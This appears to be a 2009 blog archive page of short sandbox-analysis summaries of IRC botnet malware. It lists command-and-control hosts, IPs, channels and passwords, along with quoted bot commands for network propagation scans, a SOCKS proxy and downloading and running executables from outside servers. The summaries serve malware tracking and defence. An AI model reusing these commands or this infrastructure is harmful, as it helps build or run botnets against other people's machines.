Month: May 2009

trotinet.cjb.net

Uncategorized

– IRC Conversations: 190.41.252.100:6667 Nick: USA|0064737Username: iycpimhdiJoined Channel: ##ddos## – DNS Quer:trotinet.cjb.net Initiating SYN Stealth Scan against 190.41.252.100 [1680 ports] at 03:21Discovered open port 25/tcp on 190.41.252.100Discovered open port 21/tcp on 190.41.252.100Discovered open port 31337/tcp on 190.41.252.100Discovered open port 3128/tcp on 190.41.252.100SYN Stealth Scan Timing: About 25.01% done; ETC: 03:23 (0:01:30 remaining)Discovered open port 427/tcpRead more...

dci.sinip.es

Uncategorized

* The following Host Name was requested from a host database: o dci.sinip.esRemote Host Port Numberdci.sinip.es 20000 NICK W3-0c9c[USER uuoio “fo0.net” “lol” :uuoioNICK W3-`u5bhUSER dgqaqp “fo9.net” “lol” :dgqaqp * Outgoing Connections o Transport Protocol: TCP o Remote Address: 98.174.174.76 o Remote Port: 20000 o Connection Established: 0 o Socket: 1372

irc2.revo-studios.com

Uncategorized

Analysis of the file resources indicate the following possible country of origin:Russian FederationRemote Host Port Number irc2.revo-studios.com 1034 Resolved irc2.revo-studios.com To 212.95.59.116Resolved irc2.revo-studios.com To 72.8.167.148Resolved irc2.revo-studios.com To 216.25.44.118Resolved irc2.revo-studios.com To 72.20.24.9

78.109.16.250(ssl conection port 443)

Uncategorized

[ DetectionInfo ] * Filename: C:analyzerscanphoto1226.jpeg-www.myspace.com. * Sandbox name: W32/Malware. * Signature name: W32/Smalltroj.IBZS. * Compressed: YES. * TLS hooks: NO. * Executable type: Application. * Executable file structure: OK. * Filetype: PE_I386. [ General information ] * Drops files in %WINSYS% folder. * File length: 19968 bytes. * MD5 hash: 2e65abd884a33faac83805de140a7ef6. [ Changes toRead more...

mail.fucuzzy.com

Uncategorized

– DNS Queries: Name Query Type Query Result Successful Protocol mail.fucuzzy.com DNS_TYPE_A 209.205.196.2 1 – IRC Conversations: 209.205.196.2:80 Nick: [P00|USA|08114398]Username: XP-1867Joined Channel: #q47 with Password ^B^B^B^BChannel Topic for Channel #q47: “.asc -S -s |.j #br |.j #de |.j #dk |.j #fr |.j #it |.j #jp |.j #kr |.j #mx |.j #pl |.j #ru |.j #twRead more...

t3ch.hqirc.com

Uncategorized

– DNS Queries: Name Query Type Query Result Successful Protocolt3ch.hqirc.com DNS_TYPE_A 66.252.24.30 1 + Opened Listening Ports: – IRC Conversations: 66.252.24.30:6667Nick: USA|152381Username: xynbvlJoined Channel: ##HQz##Joined Channel: #eeeChannel Topic for Channel #eee: “^socks4”Channel Topic for Channel ##HQz##: “^j #eee”Private Message to Channel #eee: “[SOCKS4]: Server started on: 192.168.0.2:11244.”

mm.esskil99.info

Uncategorized

– DNS Queries: Name Query Type Query Result Successful Protocol mm.esskil99.info DNS_TYPE_A 72.8.146.39 1 – HTTP Conversations: 72.8.146.36:80 – [72.8.146.36] Request: GET /3.exe Response: 200 “OK” – IRC Conversations: 72.8.146.39:17766 Nick: USA|907373Username: uwerqhJoined Channel: ##blast,##blast2 with Password fexa0feChannel Topic for Channel ##blast2: “.advscan asn1smb 50 2 0 -r”Channel Topic for Channel ##blast: “.xa0d http://72.8.146.36/3.exe msd.exeRead more...

ns.ircstyle.net /zonetech.info (baadshah from #bottalk)

Uncategorized

– DNS Queries: Name Query Type Query Result Successful Protocol ns.ircstyle.net DNS_TYPE_A 67.43.232.35 1 zonetech.info DNS_TYPE_A 72.10.166.195 1 … DNS_TYPE_A 0 + Opened Listening Ports: – HTTP Conversations: 72.10.166.195:80 – [zonetech.info] Request: GET /ll6.exe Response: 200 “OK” Request: GET /ns6.exe Response: 200 “OK” – IRC Conversations: 67.43.232.35:1867 Nick: YPeeOlAXUsername: tdfsckJoined Channel: #nsChannel Topic for ChannelRead more...

flys.q8pilots.net

Uncategorized

– DNS Queries: Name Query Type Query Result Successful Protocolflys.q8pilots.net DNS_TYPE_A 66.252.13.209 1 + Opened Listening Ports: – IRC Conversations: 66.252.13.209:9682Nick: ][laMer][ebivliUsername: ][laMer][ebivliJoined Channel: #l4mer#Channel Topic for Channel #l4mer#: “.asc asn2 150 5 0 -r -b -s”Private Message to Channel #l: “”